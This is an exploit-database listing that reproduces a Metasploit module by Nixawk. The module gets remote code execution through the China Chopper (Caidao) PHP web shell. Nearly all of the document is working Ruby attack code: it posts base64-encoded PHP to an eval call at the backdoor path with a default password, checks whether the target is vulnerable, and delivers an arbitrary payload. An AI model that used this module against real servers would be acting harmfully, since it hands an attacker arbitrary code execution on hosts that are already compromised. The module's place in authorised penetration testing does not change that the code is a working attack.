China Chopper Caidao PHP Backdoor Code Execution



EKU-ID: 5222 CVE: OSVDB-ID:
Author: Nixawk Published: 2015-11-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'              => 'China Chopper Caidao PHP Backdoor Code Execution',
      'Description'       => %q{
        This module takes advantage of the China Chopper Webshell that is
        commonly used by Chinese hackers.
      },
      'License'           => MSF_LICENSE,
      'Author'            => ['Nixawk'],
      'References'        =>
        [
          ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
          ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html']
        ],
      'Platform'          => ['php'],
      'Arch'              => ARCH_PHP,
      'Targets'           =>
        [
          ['Automatic', {}]
        ],
      'Privileged'        => false,
      'DisclosureDate'    => 'Oct 27 2015',
      'DefaultTarget'     => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path of backdoor', '/caidao.php']),
        OptString.new('PASSWORD', [true, 'The password of backdoor', 'chopper'])
      ], self.class)
  end

  def http_send_command(code)
    code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"
    send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path),
      'vars_post' => {
        "#{datastore['PASSWORD']}" => code
      }
    })
  end

  def check
    flag = Rex::Text.rand_text_alpha(16)
    res = http_send_command("printf(\"#{flag}\");")
    if res && res.body =~ /#{flag}/m
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_status("#{peer} - Sending exploit...")
    http_send_command(payload.raw)
  end
end